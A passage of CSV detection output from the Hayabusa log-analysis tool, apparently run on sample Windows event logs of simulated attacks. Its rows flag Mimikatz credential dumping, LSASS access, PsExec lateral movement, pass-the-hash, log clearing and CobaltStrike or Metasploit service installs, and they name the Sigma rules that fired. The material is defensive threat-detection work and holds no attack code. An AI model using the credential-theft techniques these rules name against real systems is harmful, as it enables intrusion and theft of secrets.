Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\user03 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The 
Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56661 : LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56662 : LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56663 : LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin 
Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56664 : LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56666 : LogonID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec 
remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 23:56:41.780 
+09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx +2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over 
SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: 0Konuy9q8HtkWeKS : IP Address: 10.23.123.11 : Port: 41747 : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 
0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 
+09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: 